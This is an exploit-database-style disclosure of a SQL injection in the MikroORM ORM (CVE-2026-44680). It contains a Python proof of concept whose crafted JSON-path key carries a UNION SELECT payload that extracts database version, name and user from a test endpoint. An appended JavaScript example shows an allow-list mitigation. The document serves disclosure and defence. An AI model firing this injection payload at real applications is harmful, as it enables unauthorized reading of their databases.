# Exploit Title: MikroORM 7.0.13 - SQL Injection
# Google Dork: N/A
# Date: 2026-05-27
# Exploit Author: cardosource
# Vendor Homepage: https://mikro-orm.io/
# Software Link: https://github.com/mikro-orm/mikro-orm
# Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13
# Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x
# CVE: CVE-2026-44680
# Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp

"""
Description:
The vulnerability exists because MikroORM fails to properly escape runtime-controlled
JSON path keys when building JSON_EXTRACT queries. An attacker can break out of the
JSON path context and inject arbitrary SQL.

Affected API pattern:
    em.find(Entity, { jsonColumn: { [userControlledKey]: value } })

By injecting crafted JSON-path keys, it becomes possible to execute UNION SELECT
statements and extract arbitrary database information.
"""

import requests
import json

# Endpoint of a test application that forwards "filterField" as the JSON path key
# into em.find() (the affected pattern above).
url = "http://localhost:3000/api/users/search"

payload = {
    "filterField": "$.x' ) OR 1=1 UNION SELECT @@version, DATABASE(), USER(), @@version_comment -- ",
    "filterValue": "x"
}

headers = {
    "Content-Type": "application/json"
}

response = requests.post(url, json=payload, headers=headers)

print(f"Status: {response.status_code}")
print(json.dumps(response.json(), indent=2))
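The application-side mitigation for the affected pattern, as an added example that is not MikroORM's code and not part of the advisory: the runtime-controlled key is checked against an allow-list of keys the application itself defines before it is placed into the `em.find()` where-object, so a crafted JSON-path key never reaches the query builder. The `profile` column, its allowed keys, and the `em`/`Entity` parameters of the handler are assumptions for illustration.

```javascript
// Added example (not MikroORM's code, not from the advisory): allow-list the
// JSON path key before it reaches em.find(Entity, { jsonColumn: { [key]: value } }).

// Keys the application itself defines on the JSON column (assumed for illustration).
const ALLOWED_JSON_KEYS = new Set(["country", "plan", "timezone"]);

// A key the application controls is a plain identifier; quotes, parentheses,
// `$`, dots or whitespace are never legitimate and are rejected outright.
const IDENTIFIER_RE = /^[A-Za-z_][A-Za-z0-9_]*$/;

class InvalidFilterError extends Error {}

// Returns the where-object to hand to em.find(), or throws when the requested
// field is not an allow-listed key of the JSON column.
function buildJsonFilter(jsonColumn, field, value) {
  if (typeof field !== "string" || !IDENTIFIER_RE.test(field)) {
    throw new InvalidFilterError("filterField is not a plain identifier");
  }
  if (!ALLOWED_JSON_KEYS.has(field)) {
    throw new InvalidFilterError(`filterField '${field}' is not permitted`);
  }
  // The value is bound as a query parameter by the ORM; only the key was the problem.
  return { [jsonColumn]: { [field]: value } };
}

// Request-handler shape: validate first, then call the ORM. `em` is the
// EntityManager the application already holds and `Entity` its entity class
// (both assumed here); a rejected key never produces a query.
async function searchUsers(em, Entity, body) {
  const where = buildJsonFilter("profile", body.filterField, body.filterValue);
  return em.find(Entity, where);
}

module.exports = { buildJsonFilter, searchUsers, InvalidFilterError };
```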